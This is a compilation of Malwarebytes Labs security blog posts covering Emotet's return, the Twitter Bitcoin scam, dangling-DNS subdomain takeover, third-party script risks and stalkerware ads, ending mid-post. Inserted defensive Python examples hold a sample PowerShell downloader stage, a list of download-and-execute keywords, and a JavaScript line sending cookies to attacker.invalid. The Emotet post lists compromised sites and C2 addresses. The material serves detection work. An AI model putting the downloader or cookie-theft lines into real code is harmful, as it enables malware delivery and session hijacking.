
Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chris Boyd, lead malware intelligence analyst for Malwarebytes, about Bluetooth and beacon technology.

Last month, cybersecurity experts warned the public about the data collection embedded in the Donald Trump 2020 re-election campaign’s mobile app. Once downloaded, the app requests broad access to user information, including device contacts, rough location, device storage, ID, call information, Bluetooth pairing, and more.

Tune in to hear about the progression of Bluetooth technology, how the tech is used in online advertising today, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on:

Plus other cybersecurity news:

  • Google Cloud launches Confidential VMs, a new type of virtual machine that makes use of the company’s work around confidential computing to ensure that data isn’t just encrypted at rest but also while it is in memory. (Source: TechCrunch)
  • The GoldenHelper malware found in China-mandated software is even more extensive than originally thought. (Source: Ars Technica)
  • The Atlas of Surveillance shows which tech law enforcement agencies across the country have acquired. It’s a sobering look at the present-day panopticon. (Source: Wired)
  • The Cybersecurity and Infrastructure Security Agency (CISA) told federal agencies to patch a wormable Windows DNS bug within 24 hours. (Source: BleepingComputer)
  • BlackRock is Android banking malware that can steal information from an estimated 337 apps, including Amazon, Facebook, Gmail and Tinder. (Source: Tom’s Guide)

Stay safe, everyone!

The post Lock and Code S1Ep11: Locating concerns of Bluetooth and beacon technology with Chris Boyd appeared first on Malwarebytes Labs.

How exposed are you to cybercrime?

No country, business, or person is immune to cybercrime, and as the Internet’s influence on our daily lives grows exponentially, so will the level of malicious activity throughout the world.

An ever-changing cyber landscape will always carry with it new threats, but are they the same for everyone? Who is attacked most often? Who is most at risk? And who is most exposed to cybercrime?

From endpoint attacks that are designed to gain unauthorized access, steal data, and extort money to cloud hacks that compromise and weaponize virtual machines, cybercrime can take many forms. And while new waves of threats evolve, cybersecurity hygiene doesn’t always follow suit.

There will always be a risk of falling victim to cybercrime, but it is important to remember that the very nature of risk can be boiled down to the chance that an event or situation will happen. A person, organization, or city could be at risk of an attack, but if they are prepared to defend against it, the situation is less dire.

Exposure, on the other hand, assumes an entity is subject to risk from a harmful action and, more importantly, that the entity will be negatively impacted by that risk.

Therefore, PasswordManagers.co chose to research the frequency of malicious attacks alongside the level of cybersecurity commitment across 108 countries to shine a spotlight on each country’s exposure to cybercrime.

Who is most exposed to cybercrime?

With a rating system from 0 to 1, the Cybersecurity Exposure Index calculates the level of exposure to cybercrime by country. The higher the score, the higher the exposure.

 


Out of 108 countries, Afghanistan is the most exposed, followed by Myanmar, Ethiopia, Palestine, and Venezuela.

Countries that are reliant on mobile and satellite connectivity, especially those in Africa that are fairly new to the digital landscape, are more susceptible to cyberattacks—this is reflected in the index. Africa leads the way for the highest exposure score per country (0.643), with 75 percent of its countries classified in the high and very high exposure groups. 

South America follows with an average score per country of 0.577. Venezuela is the most exposed and Uruguay the least.

Meanwhile, 67 percent of North American countries are classified in the moderate, low, and very low exposure groups, making it the second-least exposed continent. The United States is the seventh-least exposed nation globally and the least exposed country in North America, mainly as a result of having the second-highest commitment to cybersecurity of all countries.

Although Asia-Pacific places in the middle of the continent rankings with an average exposure score of 0.540, it contains some of the most exposed countries globally, including Afghanistan, with a full 1.0 exposure score, and Myanmar at 0.91. Areas surrounding the Middle East, including Pakistan and Uzbekistan, as well as pockets in central Asia, such as Mongolia and Nepal, remain under the international spotlight, meaning they will continue to attract the focus of cybercriminals and state-sponsored entities.

The front runner and least exposed continent is Europe (0.329). Seventy-one percent of European countries are classified in the low and very low exposure groups. Combined, Europe accounts for 67 percent of all countries with low and very low exposure. Finland is the least exposed country in both Europe and the world, with a score of 0.11. Following Finland, Denmark, Luxembourg, Estonia, and Norway round out the five least exposed European countries.

Learning from the best

Finland’s strong cybersecurity posture is a result of efforts from both public and private sectors to enforce cyber resilience by ensuring hygiene is met with discipline. Most notably, the Finnish government employs a cybersecurity strategy that ensures security efforts remain robust in today’s threat landscape in order to safeguard vital functions. The strategies are broken down into three key areas:

1. International cooperation: protection of the cyber environment without borders

2. Better coordination of cybersecurity management, planning, and preparedness

3. Developing cybersecurity competence  

One of the main reasons why Finland has managed to reduce its exposure and address threats effectively is because the strategies in place have been influenced by waves of cyberattacks that have been designed to worm their way through and penetrate antiquated security systems. This is a far cry from other countries, especially African states, where few have developed rigorous national cybersecurity strategies, let alone regulations and laws.

Why are exposure rates important?

The exposure rates underscore the importance of developing robust government technical institutions and frameworks for dealing with cybercrime, as well as encouraging businesses to actively elevate employee cybersecurity education and implement the necessary security systems to prevent attacks.

The Internet transcends international boundaries—we know that cybercrime is unique in that a cybercriminal doesn’t have to set foot in a specific country to attack its citizens or business entities. Existing criminal codes around the world are designed to deal with crimes that have been committed within the borders of a respective country, but to better fight cybercrime, closer global cooperation is required. Those countries ranking as the least exposed should consider sharing their knowledge and expertise with those who have a higher rate of exposure.

The rates also play an important role in educating those that reside in each country of their level of exposure. It’s not just governments and businesses that need to take action, but also individuals.

Coming to the forefront of educating on cybersecurity awareness and best practices are an increasing number of data breach reports, which document well that hackers are driven by financial gain. According to Verizon’s 2020 Data Breach Investigations Report, cybercriminals achieve that gain largely through lost or stolen credentials, which are involved in over 80 percent of hacking-related breaches.

The average person has 70–80 passwords, and, unsurprisingly, managing these without the appropriate software is extremely difficult. This often leads to poor password practices that are exploited by hackers. While reusing the same password for multiple accounts may seem like a convenient option, users significantly increase risk of exposure and exploitation.

To decrease cybercrime exposure rate, a simple yet effective method of protection is to guard login credentials for all accounts by using a password manager to cocoon sensitive information in encryption away from prying eyes. Similarly, using software to remove malware, viruses, and other threats from your devices, as well as a secure VPN to protect online privacy, are both essential to maintaining cyber hygiene and ultimately, curtailing exposure to cybercrime.


It’s baaaack: Public cyber enemy Emotet has returned

It was never a question of “if” but “when”. After five months of absence, the dreaded Emotet has returned. Following several false alarms over the last few weeks, a spam campaign was first spotted on July 13 showing signs of a likely comeback.

The Emotet botnets started actively pushing malspam on Friday, July 17, using the same techniques they employed previously. Malicious emails contain either a URL or an attachment. One familiar technique is for the document to be sent as a reply within existing email threads.

Emotet malicious emails with document attachment

The document contains a heavily obfuscated macro:

Emotet malware hidden in word document macro

Once the macro is enabled, WMI launches PowerShell to retrieve the Emotet binary from one of the remote compromised websites. It will iterate through a list until it identifies one that is responding.

Emotet malware executing payload

Once the payload is executed, it sends a confirmation back to one of Emotet’s command and control servers.
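The macro-to-payload chain above (Office macro, WMI, PowerShell downloader) leaves a distinctive process lineage that is easy to hunt for. The following is an added example written for this page, not Malwarebytes code: it flags process-creation events in which WmiPrvSE.exe is the parent of PowerShell, decodes any -EncodedCommand argument, and notes download/execute primitives in the decoded script. The events are constructed to resemble Sysmon Event ID 1 fields, the field names are an assumption, and the encoded stage is a stand-in rather than the real Emotet script.

```python
"""Flag PowerShell launched by WMI, the macro-to-payload chain described above.

Added example, not Malwarebytes code. The events are constructed to look like
Sysmon Event ID 1 (process creation) fields; the field names are an assumption.
"""
import base64
import ntpath
import re

# Constructed stand-in for the downloader stage (NOT the real Emotet script):
# try each URL in turn, stop at the first one that answers, then run the file.
_SAMPLE_STAGE = (
    "$u='http://site-a.invalid/x','http://site-b.invalid/x';"
    "foreach($s in $u){try{(New-Object Net.WebClient).DownloadFile($s,$env:TEMP+'\\p.exe');"
    "Start-Process ($env:TEMP+'\\p.exe');break}catch{}}"
)
_ENC = base64.b64encode(_SAMPLE_STAGE.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {   # macro -> WMI -> hidden, encoded PowerShell: the chain we want to catch
        "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": f"powershell -w hidden -enc {_ENC}",
    },
    {   # ordinary admin script started from the desktop: benign
        "parent_image": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # WMI spawning something other than PowerShell: not this rule's concern
        "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "image": r"C:\Windows\System32\wbem\WMIC.exe",
        "command_line": "wmic os get caption",
    },
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)
# and of -WindowStyle (-w, -win, ...), which is exactly what malspam relies on.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w[a-z]*\s+hidden")
DOWNLOAD_EXEC = ("downloadfile", "downloadstring", "net.webclient",
                 "invoke-webrequest", "invoke-expression", "iex", "start-process")


def decode_encoded_command(command_line):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    match = ENCODED_RE.search(command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a finding dict for the WMI -> PowerShell pattern, else None."""
    parent = ntpath.basename(event["parent_image"]).lower()
    child = ntpath.basename(event["image"]).lower()
    if parent != "wmiprvse.exe" or child not in POWERSHELL_IMAGES:
        return None
    command_line = event["command_line"]
    reasons = ["PowerShell spawned by WmiPrvSE.exe"]
    decoded = decode_encoded_command(command_line)
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_RE.search(command_line):
        reasons.append("hidden window")
    # Inspect the decoded script when there is one, otherwise the raw command line.
    script = (decoded or command_line).lower()
    reasons.extend(f"download/exec primitive: {p}" for p in DOWNLOAD_EXEC if p in script)
    return {"reasons": reasons, "decoded": decoded}


def scan(events):
    """Run the rule over a list of events; returns (index, finding) pairs."""
    findings = []
    for index, event in enumerate(events):
        finding = analyze_event(event)
        if finding is not None:
            findings.append((index, finding))
    return findings


if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, "; ".join(finding["reasons"]))
```

Only the first constructed event fires: the explorer-launched script has a benign parent, and WMI launching WMIC is not PowerShell. Decoding the -EncodedCommand blob is what turns an opaque base64 string into the URL list the text describes, so keep the decoded script in the alert rather than only the flag.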

Emotet has returned to its old tricks

The Emotet Trojan was by far the most visible and active threat on our radars in 2018 and 2019—right up until it went into an extended break.

Emotet is used by cybercriminals as the initial entry point, followed by a dwell time that can last days or weeks. In the meantime, other threats such as TrickBot can be delivered as a secondary payload.

The real damage that an Emotet compromise causes happens when it forms alliances with other malware gangs and in particular threat actors interested in dropping ransomware.

Malwarebytes users were already protected against Emotet thanks to our signature-less anti-exploit technology.

Malwarebytes blocks emotet with signature-less anti-exploit technology

We also detect the Emotet binary as a standalone file:

Malwarebytes detects Emotet binary as a standalone file

Indicators of Compromise

Malicious documents

5d2c6110f2ea87a6b7fe9256affbac0eebdeee18081d59e05df4b4a17417492b
4fdff0ebd50d37a32eb5c3a1b2009cb9764e679d8ee95ca7551815b7e8406206
bb5602ea74258ccad36d28f6a5315d07fbeb442a02d0c91b39ca6ba0a0fe71a2
6d86e68c160b25d25765a4f1a2f8f1f032b2d5cb0d1f39d1d504eeaa69492de0
18fab1420a6a968e88909793b3d87af2e8e1e968bf7279d981276a2aa8aa678e
d5213404d4cc40494af138f8051b01ec3f1856b72de3e24f75aca8c024783e89

Compromised sites

elseelektrikci[.]com
rviradeals[.]com
skenglish[.]com
packersmoversmohali[.]com
tri-comma[.]com
ramukakaonline[.]com
shubhinfoways[.]com
test2.cxyw[.]net
sustainableandorganicgarments[.]com
staging.icuskin[.]com
fivestarcleanerstx[.]com
bhandaraexpress[.]com
crm.shaayanpharma[.]com
zazabajouk[.]com
e2e-solution[.]com
topgameus[.]com
cpads[.]net
tyres2c[.]com
thesuperservice[.]com
ssuse[.]com

Emotet binaries

454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
d51073eef56acf21e741c827b161c3925d9b45f701a9598ced41893c723ace23
1368a26328c15b6d204aef2b7d493738c83fced23f6b49fd8575944b94bcfbf4
7814f49b3d58b0633ea0a2cb44def98673aad07bd99744ec415534606a9ef314
f04388ca778ec86e83bf41aa6bfa1b163f42e916d0fbab7e50eaadc8b47caa50

C2s

178.210.171[.]15
109.117.53[.]230
212.51.142[.]238
190.160.53[.]126
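Indicator lists like the one above are published defanged (`[.]` in place of `.`) so that they cannot be clicked or auto-linked, which means the first job for a defender is to refang and normalise them before they are useful. The following is an added example for this page, not Malwarebytes tooling: it loads a handful of the indicators listed above into typed lookup sets and runs them over constructed proxy and EDR log lines whose format is assumed, reporting exact hits and hosts whose parent domain is a listed compromised site.

```python
"""Turn the defanged IOC list above into lookup sets and run them over logs.

Added example, not Malwarebytes code. The IOC entries are copied from the list
above; the proxy and EDR log lines are constructed and their format is assumed.
"""
import ipaddress
import re

DEFANGED_IOCS = """
# compromised sites
elseelektrikci[.]com
test2.cxyw[.]net
staging.icuskin[.]com
# C2s
178.210.171[.]15
109.117.53[.]230
# Emotet binaries
454d3f0170a0aa750253d4bf697f9fa21b8d93c8ca6625c935b30e4b18835374
"""

# Constructed log lines (format assumed): four proxy records and one EDR record.
SAMPLE_LOGS = [
    "2020-07-17T10:03:12Z proxy 10.0.0.21 GET http://elseelektrikci.com/wp-admin/x/ 200",
    "2020-07-17T10:03:40Z proxy 10.0.0.21 GET https://www.example.org/ 200",
    "2020-07-17T10:04:01Z proxy 10.0.0.21 POST http://178.210.171.15:8080/ 200",
    "2020-07-17T10:04:30Z edr host21 file_write C:\\Users\\a\\AppData\\Local\\Temp\\p.exe "
    "sha256=454D3F0170A0AA750253D4BF697F9FA21B8D93C8CA6625C935B30E4B18835374",
    "2020-07-17T10:05:00Z proxy 10.0.0.21 GET http://cdn.elseelektrikci.com/x 200",
]

SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b")
DOMAIN_RE = re.compile(r"(?:[a-z0-9-]+\.)+[a-z]{2,}")
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")  # host part of a URL; stops at ':' or '/'


def refang(token):
    """Undo the common defanging conventions."""
    return token.replace("[.]", ".").replace("hxxp", "http")


def classify(ioc):
    """Type an indicator as 'sha256', 'ip' or 'domain'; None if unrecognised."""
    if SHA256_RE.fullmatch(ioc):
        return "sha256"
    try:
        ipaddress.ip_address(ioc)
        return "ip"
    except ValueError:
        pass
    if DOMAIN_RE.fullmatch(ioc):
        return "domain"
    return None


def load_iocs(text):
    """Parse a defanged, comment-bearing IOC list into lower-cased typed sets."""
    iocs = {"domain": set(), "ip": set(), "sha256": set()}
    for line in text.splitlines():
        token = refang(line.strip().lower())
        if not token or token.startswith("#"):
            continue
        kind = classify(token)
        if kind:
            iocs[kind].add(token)
    return iocs


def domain_match(host, domains):
    """'exact' for a listed host, 'parent' when a listed domain is its parent, else None."""
    if host in domains:
        return "exact"
    labels = host.split(".")
    for i in range(1, len(labels) - 1):  # never match on the bare TLD
        if ".".join(labels[i:]) in domains:
            return "parent"
    return None


def match_line(line, iocs):
    """Return (kind, value, match_type) hits for one log line."""
    hits = []
    for host in HOST_RE.findall(line):
        host = host.lower()
        try:
            ipaddress.ip_address(host)
        except ValueError:
            kind = domain_match(host, iocs["domain"])
            if kind:
                hits.append(("domain", host, kind))
        else:
            if host in iocs["ip"]:
                hits.append(("ip", host, "exact"))
    for digest in SHA256_RE.findall(line.lower()):
        if digest in iocs["sha256"]:
            hits.append(("sha256", digest, "exact"))
    return hits


def scan(lines, iocs):
    """Return (line, hits) for every line with at least one hit."""
    results = []
    for line in lines:
        hits = match_line(line, iocs)
        if hits:
            results.append((line, hits))
    return results


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_LOGS, load_iocs(DEFANGED_IOCS)):
        print(hits, "<-", line)
```

The parent-domain match is deliberately reported as a separate type: `cdn.elseelektrikci.com` is not on the list, but a host under a site known to be compromised deserves a look, while an exact hit on a listed C2 address is the higher-confidence signal.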


Coordinated Twitter attack rakes in 100 grand

“I’m feeling generous because of Covid-19. I’ll double any BTC payment sent to my BTC address for the next hour. Good luck, and stay safe out there!”

This and similar Tweets asking readers to send US$1,000 to a Bitcoin address with the promise of a double return payment went out yesterday.


Too good to be true?

Once again, social engineering has been demonstrated to be a powerful attack vector. Who would fall for such a ruse, you may ask? Looking at the traffic on said Bitcoin address, more than 100 people were duped.

The threat actors managed to rake in a substantial sum and divide it between themselves.

The victims that sent Bitcoin to this address probably do not feel so good about themselves right now. But in their defense, some of the accounts that were Tweeting out these messages were trusted figures with verified Twitter accounts. To name a few: Elon Musk, Bill Gates, Barack Obama, Kanye West, Warren Buffett, Jeff Bezos, Joe Biden, and many other high-profile accounts were taken over.

What happened?

The official Twitter Support account states that their investigation is still ongoing, but it has revealed that threat actors gained unauthorized access and used it to take control of many highly-visible (including verified) accounts and Tweet on their behalf.

From other sources we learned that the threat actors managed to use social engineering on a Twitter employee to gain access to their control panel. Through the employee panel, they were able to change associated email addresses for many accounts to addresses under their control. They then used that as a means to reset the password for the account and disable 2FA.

During the ongoing Twitter storm of misleading Tweets, Twitter Support locked down the affected accounts and removed Tweets posted by the attackers as fast as they could find them. They also limited functionality for a much larger group of accounts, like all verified accounts (even those with no evidence of being compromised) during the investigation.

Disabling the verified accounts was disruptive, but important to reduce risk

What should I do?

If you think you might be the owner of an affected account, you should:

  • Not feel bad because this one was not on you
  • Check if the address listed under email is yours
  • Reset and change your password
  • Enable 2FA

All these settings can be found when you are logged in on Twitter under More > Settings and privacy. Another setting that is worth considering is Password reset protect, which can be found under Additional password protection. Even though it probably would not have helped against this attack, it might help if you get a text or email when someone requests a password reset on your account. In this case, I’m pretty sure the employee panel would have allowed the attackers to disable that option as well.

Can victims retrieve Bitcoin?

Unfortunately, it is virtually impossible to get back stolen Bitcoin from the attackers. They are probably laundering the money right now. They will use Bitcoin mixing services to hide where the Bitcoin came from and Bitcoin exchange services to anonymously convert Bitcoin into spendable money.

The best move now is to scrutinize each and every request for donations, payments, or services—whether you know the person or not. Social engineering is a trick as old as time, and the reason it’s still so popular is that it still works.

Stay vigilant and stay safe, everyone!


Website misconfigurations and other errors to avoid

Website owners, listen up: There are lots of things you shouldn’t do with your site, and many more you should avoid with the domains you’re responsible for. Insider malice, bad luck, and the stars aligning in impossible ways can all give your online portfolio a bad hair day. However, if you want to tempt fate, you can bring on the mayhem with website misconfigurations and other ill-fortuned security and privacy errors.

In the last week, we’ve seen a few of these website mistakes go public, so we wanted to give site owners a gentle reminder to watch out for easily avoidable, but even easier to walk into—and pay the piper afterwards—errors.

Spoiler alert: Do not pay the piper.

Paying the piper: Salacious subdomains

Subdomains are a great way to add depth to your website, branching off from the main domain and allowing for content categorization. They can help make huge, unwieldy portals a little more manageable.

Problems arise when someone creates a bunch of complicated subdomains resolving to different places, and they later fall into a state of abandonment, as was the case with several mega-corporations, including Chevron, the Red Cross, and Getty Images. This unfortunately leads to issues the subdomains were never intended to address.

Opportunists took note of the sheer number of abandoned official subdomains and figured out a way to game the Azure system powering everything behind the scenes. If you didn’t know, Azure is Microsoft-powered cloud technology with a big splash of virtualisation thrown into the mix. 

What did they do?

I’ll give you a straightforward, non-Azure related example. You set up a website, yourwebsite(dot)com. You don’t want to bother with managing hosting and all the nitty-gritty that comes with it, so you point your URL at a website hosted on a free platform. Let’s go with yourwebsite(dot)freebloggingplatform(dot)com.

After a while, you become bored with your website and it falls into disrepair. You haven’t touched it in months, but someone got their hands on the blog the URL was pointing at, compromised it, and turned it into a horrendous pornography spam farm.

Imagine something similar with Azure, except that instead of a single apex domain (the landing page for your website), you created lots of subdomains like myfavouritemovies(dot)yourwebsite(dot)com and myfavouritebooks(dot)yourwebsite(dot)com.

Each of these subdomains pointed to hosted webspace on Azure, and when the organisation no longer needed the hosted space, it was released back into the wild for anybody else to grab. Unfortunately, someone in admin land forgot to stop pointing the subdomain(s) at the now relinquished Azure pages and it’s at this point the scammers swoop in.

Congratulations, website owner: You now have a forgotten-about subdomain with a good search engine page rank pointing at newly-created spam/porn/drugs/who-knows-what content.

It’s not just spam and dodgy deals you must be wary of. You could find yourself pointing your website at phishing scams, or malware installs, or potentially illegal content. It might be used for cookie harvesting or any number of awful Internet shenanigans you don’t want to get tangled up in.

You could easily be directed to a site playing host to credit card skimmers.

These so-called “dangling DNS entries” now have a support page over on the Microsoft portal, and it’s well worth a read if you expect to be managing subdomains in the near future. These kinds of attacks are almost certainly automated, so you can expect your org to be caught up if some spare subdomains are left out in the cold waving a large “please hijack me” sign.

Keep your subdomains safe, register your domains in Google Search Console, and make sure your big list of DNS antics are on an actual list. Here are some more tips on how to fix a subdomain takeover, if you’re interested.
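The "actual list" is the key control, because a dangling entry is just a CNAME whose target nobody owns any more. The following is an added example for this page, not Microsoft's or any vendor's tooling: it parses CNAME records out of a BIND-style zone fragment for a hypothetical yourwebsite.com, checks whether each target still resolves, and rates unresolvable targets on takeover-prone provider suffixes as high risk. The zone, the stub answer table and the provider suffix list are all constructed assumptions; `dns_resolves` is the live lookup you would plug in instead of the stub.

```python
"""Find CNAME records that point at names nobody owns any more (dangling DNS).

Added example, not Microsoft or Malwarebytes code. The zone fragment, the
provider suffix list and the stub resolver answers are constructed assumptions.
"""
import socket

# Hostname suffixes where a deleted resource releases its name back to the pool
# for anyone to claim. Illustrative assumption, not an exhaustive list.
TAKEOVER_PRONE_SUFFIXES = (
    ".azurewebsites.net", ".cloudapp.azure.com", ".cloudapp.net",
    ".trafficmanager.net", ".blob.core.windows.net", ".azureedge.net",
    ".azure-api.net",
)

# Constructed zone fragment for a hypothetical domain.
SAMPLE_ZONE = """
$ORIGIN yourwebsite.com.
www                  300 IN A     203.0.113.10
myfavouritemovies    300 IN CNAME movies-prod.azurewebsites.net.
myfavouritebooks     300 IN CNAME books-legacy.azurewebsites.net.   ; app deleted months ago
blog                 300 IN CNAME yourwebsite.freebloggingplatform.example.
"""

# Constructed answers standing in for DNS: True means the target name resolves.
STUB_ANSWERS = {
    "movies-prod.azurewebsites.net": True,
    "books-legacy.azurewebsites.net": False,  # resource gone, name unclaimed
    "yourwebsite.freebloggingplatform.example": True,
}


def stub_resolves(name):
    """Offline stand-in for a DNS lookup, used by the demo below."""
    return STUB_ANSWERS.get(name, False)


def dns_resolves(name):
    """Live check for real use: NXDOMAIN means the target is unclaimed.

    A transient SERVFAIL also lands here, so confirm a 'dangling' result with a
    second lookup (or dnspython's rcode) before acting on it.
    """
    try:
        socket.gethostbyname(name)
        return True
    except socket.gaierror:
        return False


def parse_cnames(zone_text):
    """Return (owner_fqdn, target) pairs for CNAME records in a zone fragment."""
    origin = ""
    records = []
    for line in zone_text.splitlines():
        line = line.split(";")[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("$ORIGIN"):
            origin = line.split()[1].rstrip(".")
            continue
        fields = line.split()
        if "CNAME" not in fields:
            continue
        owner, target = fields[0], fields[-1].rstrip(".").lower()
        fqdn = owner.rstrip(".") if owner.endswith(".") or not origin else f"{owner}.{origin}"
        records.append((fqdn.lower(), target))
    return records


def find_dangling(records, resolves):
    """Report CNAME targets that no longer resolve; 'resolves' is any name -> bool callable."""
    findings = []
    for owner, target in records:
        if resolves(target):
            continue
        prone = any(target.endswith(suffix) for suffix in TAKEOVER_PRONE_SUFFIXES)
        findings.append({"owner": owner, "target": target,
                         "risk": "high" if prone else "review"})
    return findings


if __name__ == "__main__":
    for finding in find_dangling(parse_cnames(SAMPLE_ZONE), stub_resolves):
        print(finding)
```

Run it against an export of every zone you own, not just the ones you remember, and treat a "high" finding as urgent: the fix is to delete the CNAME or re-claim the target yourself before someone else does.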

Paying the piper: Any road is code

A CDN is a content delivery/distribution network. They’re the bits and pieces of the Internet tapestry theoretically close to where you’re located, with the task of bypassing bottlenecks and hurling content in your direction faster than it would’ve arrived otherwise.

And now, for the somewhat more cynical take: If you’ve ever loaded up a website and marveled at how slow the content was but how fast the 26 adverts were, loading before the site did: That’s the wonder of a decent CDN.

Anyway.

CDNs can be used to serve up various bits and pieces of a site as and when required. It’s not uncommon for chunks of code to be pumped into the page from multiple sources, but you must offset that against the risk of the site breaking.

But what if the CDN has been serving up bad files and finds itself on a block list? What if it simply fails to load and breaks the website’s functionality? There are all sorts of things that can go wrong with that kind of setup.

What happened?

Something you probably wouldn’t expect to see is a major bank using the Internet Archive as a CDN resource. The Internet Archive is where old websites and other content live on, and it’s tremendously helpful for archival purposes. 

For some peculiar reason, Barclays bank was linking directly to an archived page to serve up their own JavaScript code. Barclays have no control over the content hosted on the Internet Archive, and if someone managed to tamper with the code, it could give banking customers quite the headache (or the site could simply lose functionality if Internet Archive went down or the page was removed for whatever reason).

Now I’m thinking back—again—to the various caveats and requirements banks place on customers to make sure they’re doing their due diligence. How would banking customers have any idea about this going on under the hood if it ended up causing them some sort of security issue? Would suspicion first fall upon the customer? How would they prove they weren’t to blame for something going wrong?

Sometimes organisations lose bits of code and have no backups. I don’t think that’s likely in this case, but if you don’t want to end up in a similar situation and start grabbing files/links from somewhere like Internet Archive, please make backups. (And check where, exactly, you’re copying and pasting code from.)
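If you must load a script from a host you do not control, the browser can at least be told exactly which bytes you reviewed, so a tampered copy is refused rather than executed. The following is an added example for this page, not Barclays' or the Internet Archive's code: it computes a Subresource Integrity value for a reviewed script body, emits the pinned `<script>` tag, and shows the browser-side check rejecting a modified copy. The script body is constructed and the URL is a placeholder.

```python
"""Subresource Integrity for a script served from a host you do not control.

Added example, not code from the page's subjects. The script body is a
constructed stand-in and the URL is a placeholder.
"""
import base64
import hashlib

ALLOWED = ("sha256", "sha384", "sha512")  # the algorithms SRI recognises


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return an integrity value such as 'sha384-<base64 digest>'."""
    if algo not in ALLOWED:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


def script_tag(src: str, content: bytes, algo: str = "sha384") -> str:
    """Emit a <script> tag pinned to the reviewed bytes.

    crossorigin="anonymous" is required for the browser to enforce SRI on a
    cross-origin load; without it the integrity attribute is ignored.
    """
    return (f'<script src="{src}" integrity="{sri_hash(content, algo)}" '
            'crossorigin="anonymous"></script>')


def verify_sri(integrity: str, content: bytes) -> bool:
    """Browser-side check, simplified: accept if any listed digest matches the bytes."""
    for entry in integrity.split():
        algo, _, b64 = entry.partition("-")
        if algo not in ALLOWED:
            continue
        try:
            expected = base64.b64decode(b64, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        if expected == hashlib.new(algo, content).digest():
            return True
    return False


# Constructed script bodies: the copy you reviewed, and one with a line appended.
REVIEWED_JS = b"window.bankWidget = function () { return 'ok'; };\n"
TAMPERED_JS = REVIEWED_JS + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"
SRC = "https://cdn.example.invalid/widget.js"  # placeholder, not a real URL

if __name__ == "__main__":
    tag = script_tag(SRC, REVIEWED_JS)
    print(tag)
    pinned = sri_hash(REVIEWED_JS)
    print("reviewed copy accepted:", verify_sri(pinned, REVIEWED_JS))
    print("tampered copy accepted:", verify_sri(pinned, TAMPERED_JS))
```

The trade-off is the one the article already hints at: with the hash pinned, a changed or removed resource fails closed and the page loses that functionality, which is the right failure mode for a bank, but it also means you still need your own copy and a deployment path that does not depend on somebody else's archive.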

Paying the piper: breaking down the breakdowns

Those are just two of the most recent examples of website mishaps that can lead to malicious takeovers or simply result in an inability to function. Those aren’t the only ways for things to go wrong, though. What else should you be looking out for and doing?

Update, update, update. If you don’t, people could bludgeon their way into your content management system/blogging platform and stuff the site with SEO spam. If your site ends up in the news for an unrelated reason, you could inadvertently drive lots of visitors to potentially bad places.

Think about all those credentials you have tied to your platforms. Is everybody listed still working at your organisation? Or do you have lots of insecure admin accounts with basic passwords scattered about the place?

Has the platform you use to power your blog been abandoned? If it’s no longer updated, you could well receive a visit from the website hack inspector. Even the biggest organisations are not immune to the perils of platform mishaps. You’ll never know the impact until everything is already burning away in some sort of digital firestorm.

It may well be worth drawing up a short digital to-do list and giving your site an inspection, because so many intricate moving parts almost demand the wheels coming off at some point. Get ahead of the curve, throw on your welding goggles, and give that site of yours the tuneup inspection of a lifetime.


Stalkerware advertising ban by Google a welcome, if incomplete, step

On Friday, July 10, Google announced it would no longer allow advertising for spyware and similar surveillance technology—often referred to as “stalkerware”—on its platform.

The change is a welcome step by one of the largest, most powerful companies in online advertising, but a close read of the policy reveals a potential loophole that could allow stalkerware-type app makers to still advertise their products on Google. Simply put, these companies could skirt the rules by changing the face of what they’re selling, without changing the core technology within.

We hope this exception will soon be addressed.

For over a year, Malwarebytes has charged ahead on a renewed commitment to protecting users and domestic abuse survivors from the threats posed by stalkerware. These apps can give individuals the opportunity to pry into text messages, emails, and call logs, rifle through web browsing and GPS location history, and reveal sensitive photos, videos, and social media activity, all without consent.

In our advocacy to protect users from these threats, we have spoken directly to domestic abuse survivors. We have provided device security trainings to local domestic abuse support organizations and family justice centers. We have met with devoted law enforcement officials. We helped launch the Coalition Against Stalkerware as a founding partner. We have contributed to research studies and we have increased our own detections for our two, internal categories of applications that provide capabilities to spy on user activity without consent: “monitor” apps and “spyware” apps.  

Through our continued work, we’ve learned that one of the ways that stalkerware-type apps avoid scrutiny is through potentially deceptive marketing campaigns that brand themselves as safe tools for parental monitoring. It is unfortunate that these same tactics could prove effective for bypassing Google’s new policy.

The change, the exception, and the problem

According to Google, the company’s updated advertising policy will “prohibit the promotion of products or services that are marketed or targeted with the express purpose of tracking or monitoring another person or their activities without their authorization.” The updated policy will take effect August 11, 2020.

